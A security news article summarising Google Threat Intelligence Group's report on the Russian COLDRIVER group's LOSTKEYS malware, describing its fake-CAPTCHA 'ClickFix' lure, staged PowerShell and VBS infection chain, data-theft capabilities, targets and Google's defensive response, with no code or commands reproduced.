Russian COLDRIVER Hackers Use LOSTKEYS Malware to Exfiltrate Sensitive Data

The Google Threat Intelligence Group (GTIG) has unveiled a new malware campaign orchestrated by the Russian state-aligned threat actor COLDRIVER (also known as UNC4057, Star Blizzard, and Callisto).

This campaign leverages a novel malware variant named LOSTKEYS, marking a significant evolution in the group’s offensive cyber capabilities.

The malware was observed in active deployments in January, March, and April 2025, targeting a spectrum of high-profile entities, including NATO governments, non-governmental organizations (NGOs), former diplomats, and individuals connected to Western military and policy circles.

Infection Chain and Evasion Techniques

The attack chain is initiated through a social engineering-driven lure: a bogus CAPTCHA webpage.

Upon “solving” the CAPTCHA, the website presents malicious PowerShell code to the victim’s clipboard, instructing them to execute the code using Windows’ “run” dialog-a tactic known as “ClickFix.”

This manual execution requirement is a clever evasion of automated email and browser sandboxing defenses, and reflects a broader industry trend among advanced persistent threat (APT) actors.

The initial PowerShell code fetches a second-stage script, frequently delivered from the IP address 165.227.148[.]68.

This intermediary leverages display resolution-based checks to evade sandbox environments and virtual machines by calculating the MD5 hash of the system’s display resolution; if this matches a predefined set, execution is aborted.

A unique identifier, varying per infection chain, is required to progress to subsequent stages.

The third stage consists of a Base64-encoded payload containing further PowerShell, which retrieves two additional files from the attacker-controlled infrastructure: a Visual Basic Script (VBS) decoder and an encoded payload.

Decryption is handled using a pair of unique keys, each specific to the infection chain, and a substitution cipher, making static analysis and bulk decryption impractical.

The decoder reconstructs the final stage-the LOSTKEYS malware-from the encrypted payload.

LOSTKEYS Malware Capabilities

LOSTKEYS, implemented as a VBS script, is engineered to harvest files from targeted directories, based on a hard-coded list of file extensions.

It also exfiltrates system metadata and enumerates running processes, funneling this data back to attacker-controlled command and control (C2) servers.

While COLDRIVER’s historical focus has been credential phishing-often targeting the personal or NGO-affiliated emails of influential Westerners-LOSTKEYS represents a tactical expansion towards direct endpoint compromise for in-depth intelligence collection.

For select high-value targets, COLDRIVER has previously deployed other custom malware, such as SPICA, to gain deeper access to document stores.

These activities have included campaigns specifically targeting individuals linked to Ukraine, journalists, and think tanks, and have been associated with occasional hack-and-leak operations.

Recent findings reveal two December 2023 malware samples masquerading as Maltego installers, which also dropped LOSTKEYS, though attribution to COLDRIVER remains inconclusive.

In response to these findings, Google has updated its Safe Browsing service to block identified malicious domains and files, and has issued government-backed threat alerts to affected Gmail and Workspace users.

Potential targets are strongly advised to enroll in Google’s Advanced Protection Program, activate Enhanced Safe Browsing, and ensure all software is up to date.

Security professionals are encouraged to review the provided YARA rules and indicators of compromise (IOCs) to bolster detection and incident response capabilities.

Indicators of Compromise (IOC) Table

Find this Story Interesting! Follow us on LinkedIn and X to Get More Instant updates